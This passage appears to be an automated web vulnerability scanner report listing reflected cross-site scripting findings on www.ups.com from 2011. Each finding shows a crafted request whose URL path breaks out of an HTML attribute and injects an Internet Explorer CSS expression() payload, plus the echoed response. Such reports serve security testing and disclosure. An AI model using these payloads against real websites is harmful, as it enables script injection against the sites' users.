GET /content/usc4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7/en/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44984


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc4ffa"style="x:expression(alert(1))"baeeaabbf7/en/about/sites.html">
...[SNIP]...

1.321. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b37ff"style%3d"x%3aexpression(alert(1))"31afa948299 was submitted in the REST URL parameter 3. This input was echoed as b37ff"style="x:expression(alert(1))"31afa948299 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/enb37ff"style%3d"x%3aexpression(alert(1))"31afa948299/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb37ff"style="x:expression(alert(1))"31afa948299/about/sites.html">
...[SNIP]...

1.322. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074 was submitted in the REST URL parameter 2. This input was echoed as 2d8f4"style="x:expression(alert(1))"fcfe492b074 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074/en/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2d8f4"style="x:expression(alert(1))"fcfe492b074/en/contact/index.html">
...[SNIP]...

1.323. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c was submitted in the REST URL parameter 3. This input was echoed as aa5fa"style="x:expression(alert(1))"9d771ad853c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enaa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa5fa"style="x:expression(alert(1))"9d771ad853c/contact/index.html">
...[SNIP]...

1.324. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3 was submitted in the REST URL parameter 2. This input was echoed as 65eef"style="x:expression(alert(1))"422f4a3ffb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3/en/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39188


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us65eef"style="x:expression(alert(1))"422f4a3ffb3/en/freight/air_freight.html">
...[SNIP]...

1.325. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf815"style%3d"x%3aexpression(alert(1))"af04c03eaf was submitted in the REST URL parameter 3. This input was echoed as bf815"style="x:expression(alert(1))"af04c03eaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enbf815"style%3d"x%3aexpression(alert(1))"af04c03eaf/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39186


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enbf815"style="x:expression(alert(1))"af04c03eaf/freight/air_freight.html">
...[SNIP]...

1.326. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31 was submitted in the REST URL parameter 2. This input was echoed as 38e44"style="x:expression(alert(1))"3c86ba18c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us38e44"style="x:expression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html">
...[SNIP]...

1.327. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7 was submitted in the REST URL parameter 3. This input was echoed as 32303"style="x:expression(alert(1))"4d43a21c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en32303"style="x:expression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html">
...[SNIP]...

1.328. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec17"style%3d"x%3aexpression(alert(1))"a447423ebc1 was submitted in the REST URL parameter 2. This input was echoed as bec17"style="x:expression(alert(1))"a447423ebc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usbec17"style%3d"x%3aexpression(alert(1))"a447423ebc1/en/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbec17"style="x:expression(alert(1))"a447423ebc1/en/freight/expedite.html">
...[SNIP]...

1.329. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538 was submitted in the REST URL parameter 3. This input was echoed as eb98d"style="x:expression(alert(1))"6d07b93d538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/eneb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb98d"style="x:expression(alert(1))"6d07b93d538/freight/expedite.html">
...[SNIP]...

1.330. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bdd"style%3d"x%3aexpression(alert(1))"a19badde730 was submitted in the REST URL parameter 2. This input was echoed as 97bdd"style="x:expression(alert(1))"a19badde730 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us97bdd"style%3d"x%3aexpression(alert(1))"a19badde730/en/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us97bdd"style="x:expression(alert(1))"a19badde730/en/freight/index.html">
...[SNIP]...

1.331. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde was submitted in the REST URL parameter 3. This input was echoed as 8b6f6"style="x:expression(alert(1))"c09d8225dde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en8b6f6"style="x:expression(alert(1))"c09d8225dde/freight/index.html">
...[SNIP]...

1.332. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696 was submitted in the REST URL parameter 2. This input was echoed as 8a8dd"style="x:expression(alert(1))"fffaad3b696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696/en/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8a8dd"style="x:expression(alert(1))"fffaad3b696/en/freight/ocean_freight.html">
...[SNIP]...

1.333. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4 was submitted in the REST URL parameter 3. This input was echoed as 17b9c"style="x:expression(alert(1))"35cba245cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17b9c"style="x:expression(alert(1))"35cba245cf4/freight/ocean_freight.html">
...[SNIP]...

1.334. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f was submitted in the REST URL parameter 2. This input was echoed as fb8ff"style="x:expression(alert(1))"0fcdf3c310f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usfb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f/en/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usfb8ff"style="x:expression(alert(1))"0fcdf3c310f/en/freight/road_freight.html">
...[SNIP]...

1.335. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8 was submitted in the REST URL parameter 3. This input was echoed as aa4d4"style="x:expression(alert(1))"2cc934cd1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enaa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:58 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa4d4"style="x:expression(alert(1))"2cc934cd1f8/freight/road_freight.html">
...[SNIP]...

1.336. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c was submitted in the REST URL parameter 2. This input was echoed as b59c3"style="x:expression(alert(1))"cb5adea911c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usb59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c/en/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb59c3"style="x:expression(alert(1))"cb5adea911c/en/index.jsx">
...[SNIP]...

